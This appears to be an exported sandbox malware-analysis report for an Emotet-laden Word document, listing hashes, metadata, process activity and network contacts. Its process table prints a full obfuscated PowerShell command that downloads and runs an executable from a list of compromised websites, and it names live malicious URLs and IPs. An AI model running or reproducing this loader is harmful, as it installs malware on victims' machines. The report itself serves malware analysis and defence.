File name: | Rep-09468685US-May-22-2019.doc |
Full analysis: | https://app.any.run/tasks/002a80fc-aa57-4d18-8ac4-7821efa7db14 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 24, 2019, 16:50:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Azerbaijan Ergonomic Metal Car, Subject: Cambridgeshire, Author: Mable Bradtke, Comments: Ameliorated Peru Direct, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May 22 14:11:00 2019, Last Saved Time/Date: Wed May 22 14:11:00 2019, Number of Pages: 1, Number of Words: 10, Number of Characters: 58, Security: 0 |
MD5: | 43ACB347E4EEBC12E33760294B87D2A5 |
SHA1: | 2A064CF5ADB094E7CD8001FC9DDD882AB4A18851 |
SHA256: | 59ED5135EB63464C4124E4D29C848E489D865FFBFFEB72CF481ED18A848D8D05 |
SSDEEP: | 3072:177HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qQyVuosKQn+of:177HUUUUUUUUUUUUUUUUUUUT52VryVuT |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserTypeLen: | 32 |
---|---|
CompObjUserType: | Microsoft Word 97-2003 Document |
Title: | Azerbaijan Ergonomic Metal Car |
Subject: | Cambridgeshire |
Author: | Mable Bradtke |
Keywords: | - |
Comments: | Ameliorated Peru Direct |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:05:22 13:11:00 |
ModifyDate: | 2019:05:22 13:11:00 |
Pages: | 1 |
Words: | 10 |
Characters: | 58 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Towne and Sons |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 67 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Champlin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3580 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Rep-09468685US-May-22-2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1020 | powershell -ExecutionPolicy bypass -noprofile -e JABsAFkATQBYAGIAawA4ADMAPQAnAEIATQBZADEAawBYACcAOwAkAFEAZgB2AEkAagBWAFUAagAgAD0AIAAnADgAMAA2ACcAOwAkAHEANwBYAEoATgBWAGMAPQAnAEMARABiAEgAYwA1AEwAJwA7ACQAZABZADcAcABDAHIAVwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUQBmAHYASQBqAFYAVQBqACsAJwAuAGUAeABlACcAOwAkAEEAZgBGAEcAegAwAGkAPQAnAEcANgBpAE0AaQBtACcAOwAkAFkAegA5AHEANABQAHUAPQAuACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAJwArACcAYwB0ACcAKQAgAG4ARQBUAGAALgBXAGUAQgBgAEMAYABsAEkAZQBgAE4AdAA7ACQASgBvAEwAMwBtAHQANQBKAD0AJwBoAHQAdABwADoALwAvAGIAZQB0AHQAeQBhAHoAYQByAGkALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBhADIAbgA3ADgAMwAyAC8AQABoAHQAdABwADoALwAvAGYAaQB0AG4AZQBzAGMAbwBvAGsALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB3AGgAcQBjADMANQA5ADIAOAAvAEAAaAB0AHQAcAA6AC8ALwB0AGUAbgBnAGYAZQBpAHcAYQBuAGsAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AeQBxADMAZwAyADMALwBAAGgAdAB0AHAAOgAvAC8AYQBzAHAAZQBjAHQAaQB2AGUAcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMgA1ADEAOAAvAEAAaAB0AHQAcAA6AC8ALwBtAGEAawBhAG4AYQBuAGsAaABhAHMAagBvAGcAeQBhAC4AMAAwADAAdwBlAGIAaABvAHMAdABhAHAAcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANwA0AHYAegAwADMALwAnAC4AcwBQAGwASQB0ACgAJwBAACcAKQA7ACQAQQBXAFAAMABCADAAcAA9ACcAUQB3ADcAdgBpAHAAaQBBACcAOwBmAG8AcgBlAGEAYwBoACgAJABpAGkAbQBaAHYAbgByADIAIABpAG4AIAAkAEoAbwBMADMAbQB0ADUASgApAHsAdAByAHkAewAkAFkAegA5AHEANABQAHUALgBEAG8AVwBOAGwAbwBBAEQAZgBpAEwARQAoACQAaQBpAG0AWgB2AG4AcgAyACwAIAAkAGQAWQA3AHAAQwByAFcAKQA7ACQAVwB0AEcAWQBtAFUAPQAnAEEAdwAyAGoAegBIACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAZABZADcAcABDAHIAVwApAC4AbABlAE4AZwB0AGgAIAAtAGcAZQAgADIAMAA2ADkAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAcwB0AEEAcgB0ACgAJABkAFkANwBwAEMAcgBXACkAOwAkAHAAWQBfAGoAYQBoAF8AcAA9ACcAUwBuAFEAQQBMAHYAWQBqACcAOwBiAHIAZQBhAGsAOwAkAHcAbgBwAHoAbwBwAHcAOQA9ACcAcAB0AGwAMQB2AG4AdwBzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYAdAAxAFcANABzAD0AJwBpAHcAYQBpAFYAMAAyAEoAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3608 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\alreadyphotos.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2892 | "C:\Program Files\Opera\opera.exe" | C:\Program Files\Opera\opera.exe | explorer.exe | |
User: admin Company: Opera Software Integrity Level: MEDIUM Description: Opera Internet Browser Version: 1748 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3580 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3F00.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1020 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8I7O7E0SS4VZZN1ZTIDM.temp | — | |
MD5:— | SHA256:— | |||
1020 | powershell.exe | C:\Users\admin\806.exe | — | |
MD5:— | SHA256:— | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR72A3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2892 | opera.exe | C:\Users\admin\AppData\Roaming\Opera\Opera\opr13C5.tmp | — | |
MD5:— | SHA256:— | |||
2892 | opera.exe | C:\Users\admin\AppData\Roaming\Opera\Opera\opr1414.tmp | — | |
MD5:— | SHA256:— | |||
3580 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:78854943818252C6E83A83506E030BA5 | SHA256:70605DF163FEFE0262A4C8EC5FEA5164CDA9B34A06150B7FAA60DE41EEFE53B8 | |||
3580 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Rep-09468685US-May-22-2019.doc.LNK | lnk | |
MD5:658AA954A8EE2B3A46C5F64F5DD8DC83 | SHA256:BDFA0D6689AF2AA5C7B8824EE13153B011C02C386FF31C6275F5D2A8F8D0CD63 | |||
3580 | WINWORD.EXE | C:\Users\admin\~$p-09468685US-May-22-2019.doc | pgc | |
MD5:2C589674E2466747C6A538BE8EF033B0 | SHA256:6F845F030EC2338D519E857C459FEE5171547F8F587295371E4A0563B83C0CEC | |||
3580 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D73105A6.wmf | wmf | |
MD5:F36B068AA7A209EAC6B6E34F9406F1BF | SHA256:1AF6A8E85B0955172A910571AA29DD6767532F59F4FA9B1D600E45669BB86941 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1020 | powershell.exe | GET | 200 | 136.243.147.87:80 | http://bettyazari.com/cgi-sys/suspendedpage.cgi | DE | html | 7.41 Kb | suspicious |
1020 | powershell.exe | GET | 200 | 104.24.96.242:80 | http://aspectivesolutions.com/wp-admin/02518/ | US | html | 3.97 Kb | malicious |
1020 | powershell.exe | GET | 403 | 145.14.145.17:80 | http://makanankhasjogya.000webhostapp.com/wp-admin/74vz03/ | US | html | 8.25 Kb | shared |
2892 | opera.exe | GET | 200 | 93.184.220.29:80 | http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl | US | der | 543 b | whitelisted |
1020 | powershell.exe | GET | 404 | 167.179.85.88:80 | http://tengfeiwanka.com/wp-admin/yq3g23/ | NZ | html | 16.6 Kb | suspicious |
1020 | powershell.exe | GET | 404 | 165.22.78.206:80 | http://fitnescook.com/wp-content/whqc35928/ | US | html | 178 b | unknown |
1020 | powershell.exe | GET | 302 | 136.243.147.87:80 | http://bettyazari.com/wp-content/a2n7832/ | DE | html | 593 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2892 | opera.exe | 93.184.220.29:80 | crl4.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
1020 | powershell.exe | 165.22.78.206:80 | fitnescook.com | — | US | unknown |
1020 | powershell.exe | 104.24.96.242:80 | aspectivesolutions.com | Cloudflare Inc | US | shared |
1020 | powershell.exe | 167.179.85.88:80 | tengfeiwanka.com | — | NZ | suspicious |
1020 | powershell.exe | 136.243.147.87:80 | bettyazari.com | Hetzner Online GmbH | DE | suspicious |
1020 | powershell.exe | 145.14.145.17:80 | makanankhasjogya.000webhostapp.com | Hostinger International Limited | US | shared |
2892 | opera.exe | 185.26.182.94:443 | certs.opera.com | Opera Software AS | — | whitelisted |
Domain | IP | Reputation |
---|---|---|
bettyazari.com |
| suspicious |
fitnescook.com |
| unknown |
tengfeiwanka.com |
| suspicious |
aspectivesolutions.com |
| malicious |
makanankhasjogya.000webhostapp.com |
| shared |
certs.opera.com |
| whitelisted |
crl4.digicert.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |